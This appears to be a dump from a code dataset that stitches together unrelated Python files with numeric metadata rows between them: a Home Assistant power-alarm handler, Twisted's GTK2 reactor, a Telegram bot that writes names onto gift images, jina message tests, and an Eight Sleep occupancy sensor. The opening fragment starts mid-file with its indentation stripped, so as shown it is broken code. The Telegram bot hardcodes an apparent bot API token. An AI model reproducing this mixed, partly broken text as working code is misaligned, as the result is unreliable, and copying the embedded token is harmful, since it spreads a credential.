except ValueError:
return
# Update peak
if new > self._upper_limit and new > self._current_peak:
self._current_peak = new
# noinspection PyUnusedLocal
def main_power_change(self, entity, attribute, old, new, kwargs):
"""Sustained Power ALARM logic control."""
try:
new = int(float(new))
except ValueError:
return
now = dt.datetime.now()
if not self._alarm_state and (new > self._upper_limit):
if new > self._current_peak:
self._current_peak = new
# Pre-Alarm state, before trigger
if self._last_trigger is None:
# Start power peak event
self.log(
"New power peak event at {} with P={} W".format(now, new),
level=LOG_LEVEL,
log=LOGGER,
)
self._last_trigger = now
elif (
now - self._last_trigger
).total_seconds() > self._min_time_high:
# TRIGGER ALARM
self._alarm_start = now
self._turn_off_measure_taken = False
type_notif = TypeNotif.ALERT_ON
data = type_notif.make_notification_message(
self._current_peak,
self._last_trigger,
self._alarm_start,
pow_instant=self.get_state(self._main_power_peak),
pow_sustained=new,
)
self.log(
f"TRIGGER ALARM with msg={data}",
level=LOG_LEVEL_ALERT,
log=LOGGER,
)
self.notify_alert(type_notif, data)
self._alarm_state = True
self._critical_alarm_state = False
self._last_trigger = now
# else: # wait some more time
# (this is the same power peak event,
# waiting min time to trigger alarm)
# pass
elif self._alarm_state: # Alarm state, waiting for reset
if new > self._current_peak:
self._current_peak = new
if (
not self._turn_off_measure_taken
and new > self._upper_limit * COEF_CRITICAL_LIMIT
):
self.log(
"ENABLE CRITICAL ALARM with {} W".format(new),
level=LOG_LEVEL_ALERT,
log=LOGGER,
)
self._critical_alarm_state = True
elif new < self._lower_limit:
if (
now - self._last_trigger
).total_seconds() > self._min_time_low:
# RESET ALARM
type_notif = TypeNotif.ALERT_OFF
data = type_notif.make_notification_message(
self._current_peak,
self._last_trigger,
self._alarm_start,
)
self.log(
"RESET ALARM MODE at {}".format(now),
level=LOG_LEVEL,
log=LOGGER,
)
self.notify_alert(type_notif, data)
self._alarm_state = False
self._critical_alarm_state = False
self._last_trigger = None
self._alarm_start = None
self._turn_off_measure_taken = False
self._current_peak = 0
elif (
not self._turn_off_measure_taken
and self._critical_alarm_state
and new < self._upper_limit
):
self.log(
"DISABLE CRITICAL ALARM (now {} W)".format(new),
level=LOG_LEVEL_ALERT,
log=LOGGER,
)
self._critical_alarm_state = False
elif (
not self._turn_off_measure_taken
and self._critical_alarm_state
and (
(now - self._alarm_start).total_seconds()
> MIN_TIME_TURN_OFF_AC
)
):
# Turn off AC if AC + heater are ON
self._turn_off_measure_taken = True
self._critical_alarm_state = False
devices_turning_off = ""
if self.get_state(BIG_CONSUMER_1_CLIMATE) == "on":
devices_turning_off = BIG_CONSUMER_1_LABEL
self.call_service("climate/turn_off", entity_id="all")
elif self.get_state(BIG_CONSUMER_2) == "on":
devices_turning_off = BIG_CONSUMER_2_LABEL
self.call_service(
"switch/turn_off", entity_id=BIG_CONSUMER_2
)
if devices_turning_off:
# Notification of devices turned off
self.log(
f"CRITICAL ACTION: Turn off '{devices_turning_off}'",
level="ERROR",
log=LOGGER,
)
type_notif = TypeNotif.ALERT_CRITICAL
data = type_notif.make_notification_message(
self._current_peak,
self._last_trigger,
self._alarm_start,
devices_off=devices_turning_off,
pow_instant=self.get_state(self._main_power_peak),
pow_sustained=new,
)
self.notify_alert(type_notif, data)
self._last_trigger = now
else:
self._last_trigger = now
elif (self._last_trigger is not None) and (
(now - self._last_trigger).total_seconds() > self._min_time_low
):
# Normal operation, reset last trigger if no more in min_time_lower
self.log(
"RESET LAST TRIGGER (was in {})".format(self._last_trigger),
level=LOG_LEVEL,
log=LOGGER,
)
self._last_trigger = None
self._current_peak = 0
| 35.285326
| 79
| 0.5196
| 1,368
| 12,985
| 4.602339
| 0.190789
| 0.03669
| 0.035737
| 0.021125
| 0.394854
| 0.310515
| 0.254288
| 0.214263
| 0.16026
| 0.141677
| 0
| 0.006724
| 0.392992
| 12,985
| 367
| 80
| 35.381471
| 0.791931
| 0.082095
| 0
| 0.40411
| 0
| 0
| 0.1353
| 0.018677
| 0
| 0
| 0
| 0.002725
| 0
| 1
| 0.023973
| false
| 0
| 0.010274
| 0
| 0.123288
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86857d42e426b63b37d2aa71caa37b9b57dd862e
| 13,391
|
py
|
Python
|
mailmynet/Maildir/proxy_postfix/Twisted-11.0.0/build/lib.linux-x86_64-2.6/twisted/internet/gtk2reactor.py
|
SPIN-UMass/SWEET
|
1b0f39222e7064f70812e3293ca023619295741d
|
[
"MIT"
] | 3
|
2020-04-02T06:23:44.000Z
|
2020-08-13T20:32:31.000Z
|
mailmynet/Maildir/proxy_postfix/Twisted-11.0.0/twisted/internet/gtk2reactor.py
|
SPIN-UMass/SWEET
|
1b0f39222e7064f70812e3293ca023619295741d
|
[
"MIT"
] | null | null | null |
mailmynet/Maildir/proxy_postfix/Twisted-11.0.0/twisted/internet/gtk2reactor.py
|
SPIN-UMass/SWEET
|
1b0f39222e7064f70812e3293ca023619295741d
|
[
"MIT"
] | 1
|
2020-04-02T06:26:10.000Z
|
2020-04-02T06:26:10.000Z
|
# -*- test-case-name: twisted.internet.test -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This module provides support for Twisted to interact with the glib/gtk2
mainloop.
In order to use this support, simply do the following::
| from twisted.internet import gtk2reactor
| gtk2reactor.install()
Then use twisted.internet APIs as usual. The other methods here are not
intended to be called directly.
When installing the reactor, you can choose whether to use the glib
event loop or the GTK+ event loop which is based on it but adds GUI
integration.
"""
# System Imports
import sys, signal
from zope.interface import implements
try:
if not hasattr(sys, 'frozen'):
# Don't want to check this for py2exe
import pygtk
pygtk.require('2.0')
except (ImportError, AttributeError):
pass # maybe we're using pygtk before this hack existed.
import gobject
if hasattr(gobject, "threads_init"):
# recent versions of python-gtk expose this. python-gtk=2.4.1
# (wrapping glib-2.4.7) does. python-gtk=2.0.0 (wrapping
# glib-2.2.3) does not.
gobject.threads_init()
# Twisted Imports
from twisted.python import log, runtime, failure
from twisted.python.compat import set
from twisted.internet.interfaces import IReactorFDSet
from twisted.internet import main, base, posixbase, error, selectreactor
POLL_DISCONNECTED = gobject.IO_HUP | gobject.IO_ERR | gobject.IO_NVAL
# glib's iochannel sources won't tell us about any events that we haven't
# asked for, even if those events aren't sensible inputs to the poll()
# call.
INFLAGS = gobject.IO_IN | POLL_DISCONNECTED
OUTFLAGS = gobject.IO_OUT | POLL_DISCONNECTED
def _our_mainquit():
# XXX: gtk.main_quit() (which is used for crash()) raises an exception if
# gtk.main_level() == 0; however, all the tests freeze if we use this
# function to stop the reactor. what gives? (I believe this may have been
# a stupid mistake where I forgot to import gtk here... I will remove this
# comment if the tests pass)
import gtk
if gtk.main_level():
gtk.main_quit()
class Gtk2Reactor(posixbase.PosixReactorBase):
"""
GTK+-2 event loop reactor.
@ivar _sources: A dictionary mapping L{FileDescriptor} instances to gtk
watch handles.
@ivar _reads: A set of L{FileDescriptor} instances currently monitored for
reading.
@ivar _writes: A set of L{FileDescriptor} instances currently monitored for
writing.
@ivar _simtag: A gtk timeout handle for the next L{simulate} call.
"""
implements(IReactorFDSet)
def __init__(self, useGtk=True):
self._simtag = None
self._reads = set()
self._writes = set()
self._sources = {}
posixbase.PosixReactorBase.__init__(self)
# pre 2.3.91 the glib iteration and mainloop functions didn't release
# global interpreter lock, thus breaking thread and signal support.
if getattr(gobject, "pygtk_version", ()) >= (2, 3, 91) and not useGtk:
self.context = gobject.main_context_default()
self.__pending = self.context.pending
self.__iteration = self.context.iteration
self.loop = gobject.MainLoop()
self.__crash = self.loop.quit
self.__run = self.loop.run
else:
import gtk
self.__pending = gtk.events_pending
self.__iteration = gtk.main_iteration
self.__crash = _our_mainquit
self.__run = gtk.main
if runtime.platformType == 'posix':
def _handleSignals(self):
# Let the base class do its thing, but pygtk is probably
# going to stomp on us so go beyond that and set up some
# signal handling which pygtk won't mess with. This would
# be better done by letting this reactor select a
# different implementation of installHandler for
# _SIGCHLDWaker to use. Then, at least, we could fall
# back to our extension module. See #4286.
from twisted.internet.process import reapAllProcesses as _reapAllProcesses
base._SignalReactorMixin._handleSignals(self)
signal.signal(signal.SIGCHLD, lambda *a: self.callFromThread(_reapAllProcesses))
if getattr(signal, "siginterrupt", None) is not None:
signal.siginterrupt(signal.SIGCHLD, False)
# Like the base, reap processes now in case a process
# exited before the handlers above were installed.
_reapAllProcesses()
# The input_add function in pygtk1 checks for objects with a
# 'fileno' method and, if present, uses the result of that method
# as the input source. The pygtk2 input_add does not do this. The
# function below replicates the pygtk1 functionality.
# In addition, pygtk maps gtk.input_add to _gobject.io_add_watch, and
# g_io_add_watch() takes different condition bitfields than
# gtk_input_add(). We use g_io_add_watch() here in case pygtk fixes this
# bug.
def input_add(self, source, condition, callback):
if hasattr(source, 'fileno'):
# handle python objects
def wrapper(source, condition, real_s=source, real_cb=callback):
return real_cb(real_s, condition)
return gobject.io_add_watch(source.fileno(), condition, wrapper)
else:
return gobject.io_add_watch(source, condition, callback)
def _add(self, source, primary, other, primaryFlag, otherFlag):
"""
Add the given L{FileDescriptor} for monitoring either for reading or
writing. If the file is already monitored for the other operation, we
delete the previous registration and re-register it for both reading
and writing.
"""
if source in primary:
return
flags = primaryFlag
if source in other:
gobject.source_remove(self._sources[source])
flags |= otherFlag
self._sources[source] = self.input_add(source, flags, self.callback)
primary.add(source)
def addReader(self, reader):
"""
Add a L{FileDescriptor} for monitoring of data available to read.
"""
self._add(reader, self._reads, self._writes, INFLAGS, OUTFLAGS)
def addWriter(self, writer):
"""
Add a L{FileDescriptor} for monitoring ability to write data.
"""
self._add(writer, self._writes, self._reads, OUTFLAGS, INFLAGS)
def getReaders(self):
"""
Retrieve the list of current L{FileDescriptor} monitored for reading.
"""
return list(self._reads)
def getWriters(self):
"""
Retrieve the list of current L{FileDescriptor} monitored for writing.
"""
return list(self._writes)
def removeAll(self):
"""
Remove monitoring for all registered L{FileDescriptor}s.
"""
return self._removeAll(self._reads, self._writes)
def _remove(self, source, primary, other, flags):
"""
Remove monitoring the given L{FileDescriptor} for either reading or
writing. If it's still monitored for the other operation, we
re-register the L{FileDescriptor} for only that operation.
"""
if source not in primary:
return
gobject.source_remove(self._sources[source])
primary.remove(source)
if source in other:
self._sources[source] = self.input_add(
source, flags, self.callback)
else:
self._sources.pop(source)
def removeReader(self, reader):
"""
Stop monitoring the given L{FileDescriptor} for reading.
"""
self._remove(reader, self._reads, self._writes, OUTFLAGS)
def removeWriter(self, writer):
"""
Stop monitoring the given L{FileDescriptor} for writing.
"""
self._remove(writer, self._writes, self._reads, INFLAGS)
doIterationTimer = None
def doIterationTimeout(self, *args):
self.doIterationTimer = None
return 0 # auto-remove
def doIteration(self, delay):
# flush some pending events, return if there was something to do
# don't use the usual "while self.context.pending(): self.context.iteration()"
# idiom because lots of IO (in particular test_tcp's
# ProperlyCloseFilesTestCase) can keep us from ever exiting.
log.msg(channel='system', event='iteration', reactor=self)
if self.__pending():
self.__iteration(0)
return
# nothing to do, must delay
if delay == 0:
return # shouldn't delay, so just return
self.doIterationTimer = gobject.timeout_add(int(delay * 1000),
self.doIterationTimeout)
# This will either wake up from IO or from a timeout.
self.__iteration(1) # block
# note: with the .simulate timer below, delays > 0.1 will always be
# woken up by the .simulate timer
if self.doIterationTimer:
# if woken by IO, need to cancel the timer
gobject.source_remove(self.doIterationTimer)
self.doIterationTimer = None
def crash(self):
posixbase.PosixReactorBase.crash(self)
self.__crash()
def run(self, installSignalHandlers=1):
self.startRunning(installSignalHandlers=installSignalHandlers)
gobject.timeout_add(0, self.simulate)
if self._started:
self.__run()
def _doReadOrWrite(self, source, condition, faildict={
error.ConnectionDone: failure.Failure(error.ConnectionDone()),
error.ConnectionLost: failure.Failure(error.ConnectionLost()),
}):
why = None
inRead = False
if condition & POLL_DISCONNECTED and not (condition & gobject.IO_IN):
if source in self._reads:
why = main.CONNECTION_DONE
inRead = True
else:
why = main.CONNECTION_LOST
else:
try:
if condition & gobject.IO_IN:
why = source.doRead()
inRead = True
if not why and condition & gobject.IO_OUT:
# if doRead caused connectionLost, don't call doWrite
# if doRead is doWrite, don't call it again.
if not source.disconnected:
why = source.doWrite()
except:
why = sys.exc_info()[1]
log.msg('Error In %s' % source)
log.deferr()
if why:
self._disconnectSelectable(source, why, inRead)
def callback(self, source, condition):
log.callWithLogger(source, self._doReadOrWrite, source, condition)
self.simulate() # fire Twisted timers
return 1 # 1=don't auto-remove the source
def simulate(self):
"""
Run simulation loops and reschedule callbacks.
"""
if self._simtag is not None:
gobject.source_remove(self._simtag)
self.runUntilCurrent()
        timeout = self.timeout()
        if timeout is None:
            timeout = 0.1
        # guard against None before min(); min(None, 0.1) breaks on Python 3
        timeout = min(timeout, 0.1)
# grumble
self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate)
class PortableGtkReactor(selectreactor.SelectReactor):
"""
Reactor that works on Windows.
Sockets aren't supported by GTK+'s input_add on Win32.
"""
_simtag = None
def crash(self):
selectreactor.SelectReactor.crash(self)
import gtk
# mainquit is deprecated in newer versions
if gtk.main_level():
if hasattr(gtk, 'main_quit'):
gtk.main_quit()
else:
gtk.mainquit()
def run(self, installSignalHandlers=1):
import gtk
self.startRunning(installSignalHandlers=installSignalHandlers)
gobject.timeout_add(0, self.simulate)
# mainloop is deprecated in newer versions
if hasattr(gtk, 'main'):
gtk.main()
else:
gtk.mainloop()
def simulate(self):
"""
Run simulation loops and reschedule callbacks.
"""
if self._simtag is not None:
gobject.source_remove(self._simtag)
self.iterate()
        timeout = self.timeout()
        if timeout is None:
            timeout = 0.1
        # guard against None before min(); min(None, 0.1) breaks on Python 3
        timeout = min(timeout, 0.1)
# grumble
self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate)
def install(useGtk=True):
"""
Configure the twisted mainloop to be run inside the gtk mainloop.
    @param useGtk: if False, use the plain glib event loop rather than the
        GTK+ one (glib is slightly faster but does not support GUI).
"""
reactor = Gtk2Reactor(useGtk)
from twisted.internet.main import installReactor
installReactor(reactor)
return reactor
def portableInstall(useGtk=True):
"""
Configure the twisted mainloop to be run inside the gtk mainloop.
"""
reactor = PortableGtkReactor()
from twisted.internet.main import installReactor
installReactor(reactor)
return reactor
if runtime.platform.getType() != 'posix':
install = portableInstall
__all__ = ['install']
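A minimal usage sketch for the reactor above, assuming this module is importable as twisted.internet.gtk2reactor and that pygtk/gobject are installed; the reactor must be installed before twisted.internet.reactor is imported anywhere else:

from twisted.internet import gtk2reactor
gtk2reactor.install()  # install() is swapped for portableInstall on non-POSIX platforms (see above)

from twisted.internet import reactor
reactor.callLater(1.0, reactor.stop)  # Twisted timers fire via the simulate() hook
reactor.run()  # iterates the gtk/glib main loop until stop()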
| 33.394015 | 92 | 0.633933 | 1,604 | 13,391 | 5.193267 | 0.26808 | 0.023409 | 0.015126 | 0.013806 | 0.219208 | 0.196399 | 0.154382 | 0.144778 | 0.144778 | 0.132533 | 0 | 0.00752 | 0.284968 | 13,391 | 400 | 93 | 33.4775 | 0.862454 | 0.356135 | 0 | 0.295337 | 0 | 0 | 0.01323 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.134715 | false | 0.005181 | 0.082902 | 0.005181 | 0.310881 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| 8687420e46b4f12f33134641d5dcf6986b995994 | 4,012 | py | Python | bot.py | menlen/one | e24f1489d98faa9b548ebd668f2860c8d671b489 | ["Apache-2.0"] | null | null | null | bot.py | menlen/one | e24f1489d98faa9b548ebd668f2860c8d671b489 | ["Apache-2.0"] | null | null | null | bot.py | menlen/one | e24f1489d98faa9b548ebd668f2860c8d671b489 | ["Apache-2.0"] | null | null | null |
# This example shows how to use inline keyboards and process button presses
import telebot
import time
from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton
import os, sys
from PIL import Image, ImageDraw, ImageFont
import random
TELEGRAM_TOKEN = '1425859530:AAF5MQE87Zg_bv3B2RLe3Vl2A5rMz6vYpsA'
bot = telebot.TeleBot(TELEGRAM_TOKEN)
channelId = -1001390673326
user_dict = {}
def TextToImg(ext):
IMAGES = [
'AROQ.jpg',
'AK47.jpg',
'BAXT.jpg',
'BASKETBOL.jpg',
'BAXTLI.jpg',
'DOST.jpg',
'ER.jpg',
'ETIK.jpg',
'FUTBOL.jpg',
'GAZ.jpg',
'HOTIN.jpg',
'BAXT.jpg',
'IPHONE.jpg',
'KOLBASA.jpg',
'KONFET.jpg',
'KOZGU.jpg',
'KUCHUK.jpg',
'MOSHINA.jpg',
'NEWISHTON.jpg',
'NOTEBOOK.jpg',
'OMAD.jpg',
'OYINCHOQ.jpg',
'PAYPQO.jpg',
'BAXT.jpg',
'PUL.jpg',
'PULTUG.jpg',
'QORQIZ.jpg',
'SOSISKA.jpg',
'TELEFON.jpg',
'TELEFONZ.jpg',
'TOK.jpg',
'TORSHIM.jpg',
'TUYA.jpg',
'UY.jpg',
'ZAMBARAK.jpg'
]
    # random.choice on a non-empty list cannot fail, so no retry logic is needed
    img = random.choice(IMAGES)
# get an image
base = Image.open(img).convert("RGBA")
ext = ext.upper()
text = ext
# make a blank image for the text, initialized to transparent text color
txt = Image.new("RGBA", base.size, (255,255,255,0))
# get a font
fnt = ImageFont.truetype("OpenSans-Italic.ttf", 40)
# get a drawing context
d = ImageDraw.Draw(txt)
# draw text, half opacity
d.text(((800)/2,(1136)/2), text, font=fnt, fill=(255,0,0,255), anchor='mb')
out = Image.alpha_composite(base, txt)
filename = random.randint(1,35)
g = out.save(f'{filename}.png')
return filename
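For reference, a minimal sketch of calling TextToImg on its own (it assumes the listed JPG backgrounds and OpenSans-Italic.ttf sit next to the script):

stem = TextToImg('ALI')  # composites the text onto a random background
print(f'saved {stem}.png')  # stem is a random integer between 1 and 35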
def gen_markup():
markup = InlineKeyboardMarkup()
markup.row_width = 1
    # "Azo bo'ling" = "Join"; "Tasdiqlash" = "Confirm"
    markup.add(InlineKeyboardButton("Azo bo'ling", callback_data="cb_yes", url='t.me/onideal'),
               InlineKeyboardButton("Tasdiqlash", callback_data="cb_no"))
return markup
def getUserFromChannel(userId):
u = bot.get_chat_member(channelId, userId)
return u.status
@bot.callback_query_handler(func=lambda call: True)
def callback_query(call):
if call.data == "cb_yes":
bot.answer_callback_query(call.id, "Answer is Yes")
elif call.data == "cb_no":
u = getUserFromChannel(call.from_user.id)
if u == 'member':
            msg = bot.send_message(call.from_user.id, """\
Juda soz!!!, Ismingizni yozing
""")  # "Great! Now type your name"
bot.register_next_step_handler(msg, process_name_step)
else:
            bot.send_message(call.from_user.id, f"Salom {call.from_user.first_name}, kanallarga a'zo bo'ling va A'zolikni tekshirish buyrug'ini tanlang", reply_markup=gen_markup())  # "Hello {name}, join the channels and pick 'Verify membership'"
def process_name_step(message):
try:
name = message.text
myfile = TextToImg(name)
photoSend = open(f'{myfile}.png', 'rb')
        caption = f'{name} : ismiga sovga @onideal \n@giftmerobot \n@mygiftrobot'  # "a gift for {name}"
bot.send_photo(message.chat.id, photoSend, caption=caption)
except Exception as e:
bot.reply_to(message, 'oooops')
@bot.message_handler(func=lambda message: True)
def message_handler(message):
us = getUserFromChannel(message.chat.id)
if us == 'member':
        msg = bot.send_message(message.chat.id, """\
Juda soz!!!, Ismingizni yozing
""")  # "Great! Now type your name"
bot.register_next_step_handler(msg, process_name_step)
else:
        bot.send_message(message.chat.id, f"Salom {message.from_user.first_name}, kanallarga a'zo bo'ling va A'zolikni tekshirish buyrug'ini tanlang", reply_markup=gen_markup())  # "Hello {name}, join the channels and pick 'Verify membership'"
bot.polling(none_stop=True)
| 30.861538 | 181 | 0.592722 | 483 | 4,012 | 4.815735 | 0.428571 | 0.017197 | 0.020636 | 0.018057 | 0.195185 | 0.187446 | 0.171109 | 0.153912 | 0.153912 | 0.153912 | 0 | 0.023554 | 0.280409 | 4,012 | 129 | 182 | 31.100775 | 0.782127 | 0.053091 | 0 | 0.141509 | 0 | 0.018868 | 0.247884 | 0.028665 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056604 | false | 0 | 0.056604 | 0 | 0.141509 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| 86880b5b73b7634f999e8879e1b07c2360a00ae8 | 6,256 | py | Python | tests/unit/types/message/test_message.py | Immich/jina | 1f5f7cf4d82029d76ab41df157526fe6f6e0da50 | ["Apache-2.0"] | 1 | 2021-02-25T19:28:50.000Z | 2021-02-25T19:28:50.000Z | tests/unit/types/message/test_message.py | Immich/jina | 1f5f7cf4d82029d76ab41df157526fe6f6e0da50 | ["Apache-2.0"] | 4 | 2020-09-01T17:47:27.000Z | 2021-04-16T23:11:57.000Z | tests/unit/types/message/test_message.py | Immich/jina | 1f5f7cf4d82029d76ab41df157526fe6f6e0da50 | ["Apache-2.0"] | null | null | null |
import sys
from typing import Sequence
import pytest
from jina import Request, QueryLang, Document
from jina.clients.request import request_generator
from jina.proto import jina_pb2
from jina.proto.jina_pb2 import EnvelopeProto
from jina.types.message import Message
from jina.types.request import _trigger_fields
from tests import random_docs
@pytest.mark.parametrize('field', _trigger_fields.difference({'command', 'args', 'flush'}))
def test_lazy_access(field):
reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10)))
for r in reqs:
assert not r.is_used
        # access the parametrized field, which forces deserialization
print(getattr(r, field))
# now it is read
assert r.is_used
def test_multiple_access():
reqs = [Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))]
for r in reqs:
assert not r.is_used
assert r
assert not r.is_used
for r in reqs:
assert not r.is_used
assert r.index
assert r.is_used
def test_lazy_nest_access():
reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10)))
for r in reqs:
assert not r.is_used
        # write access to a nested document field
r.docs[0].id = '1' * 16
# now it is read
assert r.is_used
assert r.index.docs[0].id == '1' * 16
def test_lazy_change_message_type():
reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10)))
for r in reqs:
assert not r.is_used
        # write access switches the message to a control request
r.control.command = jina_pb2.RequestProto.ControlRequestProto.IDLE
# now it is read
assert r.is_used
assert len(r.index.docs) == 0
def test_lazy_append_access():
reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10)))
for r in reqs:
assert not r.is_used
r.request_type = 'index'
        # write access appends to the docs field
r.docs.append(Document())
# now it is read
assert r.is_used
def test_lazy_clear_access():
reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10)))
for r in reqs:
assert not r.is_used
        # write access clears the index field
r.ClearField('index')
# now it is read
assert r.is_used
def test_lazy_nested_clear_access():
reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10)))
for r in reqs:
assert not r.is_used
        # write access clears a nested field
r.index.ClearField('docs')
# now it is read
assert r.is_used
def test_lazy_msg_access():
reqs = [Message(None, r.SerializeToString(), 'test', '123',
request_id='123', request_type='IndexRequest') for r in request_generator(random_docs(10))]
for r in reqs:
assert not r.request.is_used
assert r.envelope
assert len(r.dump()) == 3
assert not r.request.is_used
for r in reqs:
assert not r.request.is_used
assert r.request
assert len(r.dump()) == 3
assert not r.request.is_used
for r in reqs:
assert not r.request.is_used
assert r.request.index.docs
assert len(r.dump()) == 3
assert r.request.is_used
def test_message_size():
reqs = [Message(None, r, 'test', '123') for r in request_generator(random_docs(10))]
for r in reqs:
assert r.size == 0
assert sys.getsizeof(r.envelope.SerializeToString())
assert sys.getsizeof(r.request.SerializeToString())
assert len(r.dump()) == 3
assert r.size > sys.getsizeof(r.envelope.SerializeToString()) \
+ sys.getsizeof(r.request.SerializeToString())
def test_lazy_request_fields():
reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10)))
for r in reqs:
assert list(r.DESCRIPTOR.fields_by_name.keys())
def test_request_extend_queryset():
q1 = {'name': 'SliceQL', 'parameters': {'start': 3, 'end': 4}}
q2 = QueryLang({'name': 'SliceQL', 'parameters': {'start': 3, 'end': 4}, 'priority': 1})
q3 = jina_pb2.QueryLangProto()
q3.name = 'SliceQL'
q3.parameters['start'] = 3
q3.parameters['end'] = 4
q3.priority = 2
r = Request()
r.queryset.extend([q1, q2, q3])
assert isinstance(r.queryset, Sequence)
assert len(r.queryset) == 3
for idx, q in enumerate(r.queryset):
assert q.priority == idx
assert q.parameters['start'] == 3
assert q.parameters['end'] == 4
# q1 and q2 refer to the same
assert len({id(q) for q in r.queryset}) == 2
r2 = Request()
r2.queryset.extend(r.queryset)
assert len({id(q) for q in r2.queryset}) == 2
r = Request()
r.queryset.append(q1)
r.queryset.append(q2)
r.queryset.append(q3)
for idx, q in enumerate(r.queryset):
assert q.priority == idx
assert q.parameters['start'] == 3
assert q.parameters['end'] == 4
with pytest.raises(TypeError):
r.queryset.extend(1)
@pytest.mark.parametrize('typ,pb_typ', [('train', jina_pb2.RequestProto.TrainRequestProto),
('index', jina_pb2.RequestProto.IndexRequestProto),
('search', jina_pb2.RequestProto.SearchRequestProto),
('control', jina_pb2.RequestProto.ControlRequestProto)])
def test_empty_request_type(typ, pb_typ):
r = Request()
assert r.request_type is None
with pytest.raises(ValueError):
print(r.body)
r.request_type = typ
assert r._request_type == typ
assert isinstance(r.body, pb_typ)
@pytest.mark.parametrize('typ,pb_typ', [('index', jina_pb2.RequestProto.IndexRequestProto),
('search', jina_pb2.RequestProto.SearchRequestProto)])
def test_add_doc_to_type(typ, pb_typ):
r = Request()
r.request_type = typ
for _ in range(10):
r.docs.append(Document())
r.groundtruths.append(Document())
assert len(r.docs) == 10
assert len(r.groundtruths) == 10
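These are ordinary pytest tests; a sketch of running just this module from the repository root (the path comes from the record metadata):

import pytest
raise SystemExit(pytest.main(['-q', 'tests/unit/types/message/test_message.py']))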
| 32.082051 | 111 | 0.634431 | 853 | 6,256 | 4.520516 | 0.141852 | 0.023859 | 0.035788 | 0.033714 | 0.610737 | 0.544865 | 0.509855 | 0.466805 | 0.466805 | 0.449689 | 0 | 0.019796 | 0.249041 | 6,256 | 194 | 112 | 32.247423 | 0.800979 | 0.037884 | 0 | 0.426573 | 0 | 0 | 0.036137 | 0 | 0 | 0 | 0 | 0 | 0.370629 | 1 | 0.090909 | false | 0 | 0.06993 | 0 | 0.160839 | 0.013986 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| 868a5177cfe7a43dcc855371fdd275a394644658 | 2,074 | py | Python | homeassistant/components/eight_sleep/binary_sensor.py | liangleslie/core | cc807b4d597daaaadc92df4a93c6e30da4f570c6 | ["Apache-2.0"] | 2 | 2020-01-03T17:06:33.000Z | 2020-01-13T18:57:32.000Z | homeassistant/components/eight_sleep/binary_sensor.py | liangleslie/core | cc807b4d597daaaadc92df4a93c6e30da4f570c6 | ["Apache-2.0"] | 1,016 | 2019-06-18T21:27:47.000Z | 2020-03-06T11:09:58.000Z | homeassistant/components/eight_sleep/binary_sensor.py | liangleslie/core | cc807b4d597daaaadc92df4a93c6e30da4f570c6 | ["Apache-2.0"] | null | null | null |
"""Support for Eight Sleep binary sensors."""
from __future__ import annotations
import logging
from pyeight.eight import EightSleep
from homeassistant.components.binary_sensor import (
BinarySensorDeviceClass,
BinarySensorEntity,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from . import EightSleepBaseEntity
from .const import DATA_API, DATA_HEAT, DOMAIN
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigType,
async_add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
    """Set up the Eight Sleep binary sensor."""
if discovery_info is None:
return
eight: EightSleep = hass.data[DOMAIN][DATA_API]
heat_coordinator: DataUpdateCoordinator = hass.data[DOMAIN][DATA_HEAT]
entities = []
for user in eight.users.values():
entities.append(
EightHeatSensor(heat_coordinator, eight, user.userid, "bed_presence")
)
async_add_entities(entities)
class EightHeatSensor(EightSleepBaseEntity, BinarySensorEntity):
    """Representation of an Eight Sleep heat-based sensor."""
_attr_device_class = BinarySensorDeviceClass.OCCUPANCY
def __init__(
self,
coordinator: DataUpdateCoordinator,
eight: EightSleep,
user_id: str | None,
sensor: str,
) -> None:
"""Initialize the sensor."""
super().__init__(coordinator, eight, user_id, sensor)
assert self._user_obj
_LOGGER.debug(
"Presence Sensor: %s, Side: %s, User: %s",
sensor,
self._user_obj.side,
user_id,
)
@property
def is_on(self) -> bool:
"""Return true if the binary sensor is on."""
assert self._user_obj
return bool(self._user_obj.bed_presence)
